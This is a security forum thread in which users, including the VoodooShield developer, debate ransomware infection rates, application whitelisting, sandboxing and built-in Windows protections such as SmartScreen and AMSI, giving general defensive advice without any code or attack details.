Interesting AntiRansomware freeware

Discussion in 'other anti-malware software' started by Windows_Security, Dec 30, 2016.

  1. Dan, It just does not make sense when you place this research data in real world perspective.

    The AV-industry is a 75 billion market (annuallly). When the infection risk is that high, common cause-effect logic would stop people spending money on security. When the risk of for instance ransomware alone is that high (nearly 50%) it would not make sense to spend money on something which clearly does not deliver what it promises.

    Imagine this conversation between a CFO (Jane) and a CIO (Joe). Hey Joe I was preparing last 2016 fiscal closing and noticed you spend X.9 million on security and today I lost all my data due to a ransomware infection. Well Jane when we have paid the ransomware, I will show a report which clearly states that companies have a near 50% ransomware infection rate (Joe). Last year (Joe continuous) we had no infections at all and this year we just started unlucky.

    In a real world situation would you think the CIO would come away with such a data disaster by just handling over a research report or would it be more likely that the CFO suggests a career change to the CIO?

    What is your take on this? (probably the PC should be locked when it is at risk) :D

    Regards Kees


    TIP to Wilders Members: in stead of installing anti-ransom freeware as second layer above, improve you first line of defense:

    1. Ask Dan (@VoodooShield) for a free license of VS and
    2. Ask Erik (@erikloman) for a free license of HPMA

    Your first base (proactive protection) should be covered more than adequately
     
    Last edited by a moderator: Jan 5, 2017
  2. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    I think there are several other things that need to be considered... for example red tape, budgets, all the work involved in deploying new software, and believe it or not, office politics (like maybe the CEO insists that the company use a security product from a buddy of theirs at a security company)... along with a lot of other factors. For example, one reason companies are reluctant to implement traditional application whitelisting is because it can take 3-6 months to deploy, not to mention all of the end user headaches involved after it is deployed.

    Until recently, companies simply thought of malware as a cost of doing business, but ransomware and the widely publicized security breaches from the last year or two are total game changers. And this is not a guess on my part... I know this for certain because I have been talking to large companies that confirm this when they inquire about VS.

    So there has already been 2 major game changers (ransomware and the widely publicized security breaches), but the final game changer will be when someone holds a company accountable for not protecting their data, and the case goes to court. I was just talking with an accounting firm recently, and they were telling me that they are now accountable if their client's data is stolen. They actually have to encrypt all of their data on their networks... there are actually "smash and grabs", where people steal physical servers and computers.

    At some point I am betting that we will reach a breaking point... and yes, all computer will be locked ;). Whether it is with VS or some other user-friendly lock, or some other magical technology that approaches 100% efficacy, the time is approaching.

    Here is a quick and dirty test... go to any computer repair shop and ask the techs how bad the malware situation is. They will tell you ;).
     
  3. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    BTW, I just thought of this, here is another way of viewing your social media analogy.

    How many people do you know who have NOT been affected by all of the widely publicized security breaches, and who do NOT get a shiny new credit card every 6 months? A handful of malware can do A LOT of damage.
     
  4. OverDivine

    OverDivine Registered Member

    Joined:
    Jan 16, 2009
    Posts:
    24
    Almost 10 years without an infection using only srp (disallowed).Viruses, spyware, rootkits,keylogger, trojans, etc. and now ransomware are just names to scare people. I wonder what will come next. If you get infected it's most of the time user's fault. Also because it exists it doesn't mean it is there to hurt you. I don't wear a kevlar vest or a bomb shelter.
     
  5. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    That research was directed to enterprise ransomware risk.

    A few years back, ransomware after its initial successes turned enterprise mode. It's simple malware economics to target enterprises since the payback and odds of receiving it are much greater there. So I do agree that the odds of individual users being targeted are much lower. The individual user's risk lies with script kiddies and the like wanting to also cash in on the ransomware bonanza. The risk to individual users from amateur ransomware developer wan-a-bees is not so much the ransomware as the risk of their garbage code inadvertently trashing your system.

    Finally as the article points out, the vast majority of ransomware has been and is still being delivered via e-mail; I believe the figure was 96%. Mitigations there are avoiding web mail and using an e-mail client. Disable all live content rendering in the e-mail. Disable all auto attachment opening. Receive all e-mail in text mode only. And finally, employ a security solution that scans all incoming e-mail upon arrival. Note this requires a solution capable of unencrypting e-mail so that it can be scanned prior to hitting your HDD.
     
    Last edited: Jan 5, 2017
  6. guest

    guest Guest

    +1
    last time I had issues with virus infection was with Windows XP sp1
    Since then no AV or security product has saved me from getting infected
     
  7. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    FYI - no company in their right mind is going to publically disclose a security incident unless:

    1. They legally have to do so.

    2. The incident causes a loss of operating capability that the public can easily determine it e.g. hospital shuts down elective surgeries and the like since they are a ransomware victim; news media publishes incident details; etc..

    SOP for any company would be to blame the interruption in service to anything other than a internal security incident such as computer malware.

    -EDIT- If a company's CIO/SIO/IT Director is stupid enough to respond to surveys like this; fire him!

    Breaches vs. Incidents


    This report uses the following definitions:


    Incident: A security event that compromises the integrity,


    confidentiality or availability of an information asset.


    Breach: An incident that results in the confirmed disclosure (not just


    potential exposure) of data to an unauthorized party.

     
    Last edited: Jan 5, 2017
  8. @itman, You are 100% right, but this data is based on security companies mentioned on the cover, so it does not mean it is publicly disclosed. It is just confirmed numbers, no naming and shaming.
     
  9. boredog

    boredog Registered Member

    Joined:
    Feb 1, 2015
    Posts:
    2,499
    The company I worked for last year before retiring was hit by powerliks. I had to fix my own computer. the it people got fired.
    I got a shinny new credit card in 2016. my bank contacted me and said a business I had done business with was compromised. I did a little research and think it was wendy's. my sisters computer is running kubuntu. she was getting hit on face book a few times a week by fake ransomeware. locked her browser. at least she called me right away. I then installed chromium and she has not been hit since. the only thing I still get hit with is them pesky page redirects now and then.
    a lot of those are caught by malewarebytes 2.0. I can't use 3.0 yet.
     
  10. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Some "serious companies" do lock their computers, but the vast majority currently do not. Virtualization is every bit as annoying to the end user as locking the computer... possibly more so, so I do not believe it is the answer. Besides, there is probably not one solution that is going to fix all of our problems.
     
  11. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    True, but my dog has not been sick in 10 years. Does that mean that no dogs have been sick in the last 10 years?

    I live in a seemingly crime free Kansas City suburb and used to date a girl who worked at the 911 emergency call center. Every year (since I can remember), we have heard how our county has one of the lowest crime rates in the nation... almost crime free. After dating her for a while, I was absolutely shocked to hear about all of the violent crimes that are constantly happening, while most people remain blissfully unaware.

    For 17 years I have been fixing computers and removing malware, mostly for 250-300 business clients. While it is absolutely true that some clients seem to not have any malware issues, the majority do... some more than others ;). One client in particular, I have known from the beginning (17 years). He runs a franchise office with just him and his wife, and they simply never had malware issues. About 5 years ago, when VS was first released, I mentioned that he should consider installing it on their 2 computers. He was reluctant and rationalized that they had never had a virus before, so they do not need to install VS. Well, about a year a go (so after 15 or so years of not getting a virus), they were hit hard. I cleaned up their computers, installed VS, and now they love it.

    I also have the advantage of being able to look at VS's user logs while working on a my clients computers to see what all had been blocked the last year or so. Trust me, malware is a full blown epidemic. Just because you do not hear about it, does not mean it does not happen... the people on the front line know that there is an epidemic going on.

    Edit: BTW, I totally agree... security companies should not be using the word "ransomware" as a scare tactic... especially if they are charging for their software without offering a free version... and especially if their software is not as effective as they initially hoped it would be (thereby keeping everyone believing that a holy grail actually exists in computer security).
     
    Last edited: Jan 5, 2017
  12. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,063
    Location:
    Canada
    It just seems easiest to use an ad/script blocker and surf in a sandbox, either a 3rd party sandbox or O/S built-in sandbox, as well as back up important personal data. Throw in common sense when handling email and pretty much all bases are covered. At least that's what has been working flawlessly for me.
     
  13. WildByDesign

    WildByDesign Registered Member

    Joined:
    Sep 24, 2013
    Posts:
    2,587
    Location:
    Toronto, Canada
    Three very solid points there, Dan. I've added underlining in quote. There is a recent thread on Casey Smith's (subTee) Twitter page (https://twitter.com/subTee/status/815017113257648128) discussing Application Whitelisting (generally controlling application executions / locking) where some users discuss the pros and cons of doing that in large organizations at larger scale. Ultimately it comes down to putting the appropriate time and resources into achieving this, but it certainly is possible and most definitely a crucial element when it comes to computer security these days. Even though application whitelisting / anti-execution has been around for many years, it has become more and more important in recent years.

    Virtualization is great, no doubt, but has it's performance implications but also requires appropriate time, education and general resources.

    Point number three is a big one as well because with the increasing sophistication of malware coding (and financial motivation) of modern day hacking and links with organized crime, in this day and age users cannot get away with using one single security software program to stay protected. Although if I'm being completely honest, your own VoodooShield has been evolving as well with recent development to cover several layers of protection. 5+ years ago, I would have protected many of my clients' machines with a simple AV. But these days, AV takes a backseat and is more used for reactive work with analysis/forensics after-the-fact. For everyday home user clients, without a doubt, I would recommend VS as first line of defence because of what it achieves under-the-hood and for making that easy on the surface for users to understand from a UI perspective. Cheers, Dan, all the best in this new year!
     
  14. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    Historically and continuing, the majority of ransomware have employed script droppers to initiate the infection process. Scripts are effective because besides their engines being Windows trusted processes, can and often do contain packed and obfuscated code that decrypts in memory. Some security solutions employed advanced memory scanners that can detect this activity. If they are honest about this capability, like Eset, they will publically admit that this type detection is post infection and that remediation activity is one of containment versus prevention.

    Preventing script execution is an effective mitigation against this type of activity. However, the average user will not do this. Upgrading to Win 10 and using a security solution that utilizes the provided AMSI interface is the most straightforward way to mitigate these advanced scripts from executing: https://blogs.technet.microsoft.com...-application-developers-new-malware-defenses/

    The crux of the issue is that scripting engines can run code that was generated at runtime. This is where the new Antimalware Scan Interface comes in.

    While the malicious script might go through several passes of deobfuscation, it ultimately needs to supply the scripting engine with plain, unobfuscated code.

    When it gets to this point, the application can now call the new Windows AMSI APIs to request a scan of this unprotected content.
     
  15. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Hey WBD, long time no talk, I hope you are doing well! Yeah, I totally agree, Casey explains application whitelisting quite nicely. When I was watching the video on his speech, I kept saying "I have been saying that for 5 years now" ;). I have also been saying this ;)... http://www.theregister.co.uk/2016/1...s_try_whitelists_not_just_bunk_antivirus_ids/

    Traditional antivirus has come a long way in the last 3-5 years... they have done some amazing things.

    But after hearing the question "I have antivirus software, how did I get a virus?" over 500 times, I finally realized that the people asking the question did not seem to realize that their AV software was not designed or intended to stop EVERYTHING.

    You should be able to ask a security software provider the following question... "Will your software, in theory, block all executable malware" (obviously most will have to say no if they are being honest). At that point, it is up to the user if they want to add a lock their computer or not.

    I will say, people are very, very odd... when they are first infected with malware, they totally freak out and it is their only concern. It only takes a week or so for them to once again become complacent. But if someone can design a lock that is user-friendly enough, we can overcome the complacency, and fix this issue.
     
  16. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    That setup sounds like it would work great for you... but what about the 60 year old teller at my bank who told me that she "knew nothing about computers". And when I asked her if she received email on her computer, she said "yeah, we do". True story.

    Your setup would not work for her... her computer needs to be locked down.
     
  17. OverDivine

    OverDivine Registered Member

    Joined:
    Jan 16, 2009
    Posts:
    24
    Of course it doesn't. But you can take all the dogs and give them standard vaccination or no vaccination at all some of them will still get sick and some wont. Then new diseases appear and luckily there are vendors that have treatments for the new diseases. And you care about your dog and you want it to be healthy and happy.So you give him the new treatments. But there is a catch. Despite being latest and best in reviews and tests they are not working 100%. It may prevent your dog to get sick but there is a chance that it won't. And from time to time new scarier disease rises. I hope the dog is still healthy in the end.
     
  18. harsha_mic

    harsha_mic Registered Member

    Joined:
    Mar 11, 2009
    Posts:
    815
    Location:
    India
    I am not sure if it is right question here. Since, dev's are active here now!! I will go ahead -

    Does anyone have any idea - ?
    How good (or is it any good), if Smart Screen in Windows 10 blocks -
    • Ransomware - ?
      • Initiated from Scripts - ?
    • Malware initiated from scripts - ?

    I am also curious if AMSI (as quoted by @itman) is integrated into Smart Screen? :)
     
  19. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    BTW, try this little experiment... think of the most novice computer user you know, and install VS for them. Spend 30 seconds with them, explaining that this little shield will lock their computer when they are at risk, and it will keep them safe. When you ask them how they like VS 2-3 weeks later, the odds are extremely high that you will not hear the word "annoying", but rather, you will hear the word "love".
     
  20. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Hehehe, sorry, I am not being sarcastic here... but if I am reading you correctly, that is a rather strong argument in favor of locking the computer when it is at risk?
     
  21. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Almost ALL AV software, including Windows Defender and Smart Screen have come a VERY LONG ways the last couple of years (in reaction to the growing malware epidemic), and they do some amazing things, but they are not designed to be a lock, they are designed to be a filter... so there WILL be bypasses.

    But yeah, Smart Screen and Defender is pretty darn good now. Actually, VoodooAi is quite similar to SmartScreen in the way that it works... MS just needs to use about 10-15x the number of features and provide the user some file insight.

    Than again... do you want your bank, doctors office, patent attorney office, accounting office, etc, to have "pretty darn good" protection... or should their freaking computer be freaking locked when they are on the freaking internet ;).

    Not sure about your AMSI... itman can help you there!
     
  22. OverDivine

    OverDivine Registered Member

    Joined:
    Jan 16, 2009
    Posts:
    24
    yes and no. Limiting user options for error is a great start. But there are dozens of softwares one better than the other and i think that none can protect you 100%. If there is a user there is a risk and humans are prone to errors. Or maybe it is just luck depending on what is behind the next link you click. And all users are uniques and it doesn't really matter their knowledge about malware. I mean some play the violin, pilot jet planes or whatever and they don't care or don't have knowledge about malware. One can use all programs or no programs and still get infected. Software x protects you against ransomware or so they say but in reality it protects you only against some.For each user is different balance between their willingness or need to learn a new software/setup their feeling of security and the ability to use their computer the way they want to use it.
     
  23. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,063
    Location:
    Canada
    Agreed, computers in a corporate environment need to be locked down, although my comments were directed primarily toward security knowledgeable members of this forum, especially those who depend heavily on using multiple 3rd-party security applications.
     
  24. VoodooShield

    VoodooShield Registered Member

    Joined:
    Dec 9, 2011
    Posts:
    5,881
    Location:
    United States
    Ok, now repeat that experiment hundreds or thousands of times, and let me know how it goes, especially when your clients will take every opportunity to call you for a freebie ;). Keep in mind, you can switch to Smart or Always ON after a day or so.

    I really did not intend to join this conversation... I just wanted to post what I thought were the most representative and relevant malware stats (from Microsoft), which is worldwide, approximately 20% of endpoints encounter malware and approximately 8.6% are infected annually. Then again, keep in mind these are only the known / identified threats... but that is a TOTALLY different discussion. Either way, these stats are based on a minimum sample size of 100,000 end points (I believe per country), and obviously each of the end points had other random security software installed, in addition to the required Microsoft security products.

    But overall, my point is... if someone can create a user-friendly lock the computer AND the end user feels more safe and secure, while constantly commenting how they love how the lock makes them feel safe and secure, then it is a win-win for everyone, right?

    Edit: BTW, assuming my math is correct (8.6% infections divided by 19.5% encounters), does this mean that the threat was blocked only 55.9% of the time? ;)
     
    Last edited: Jan 5, 2017
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.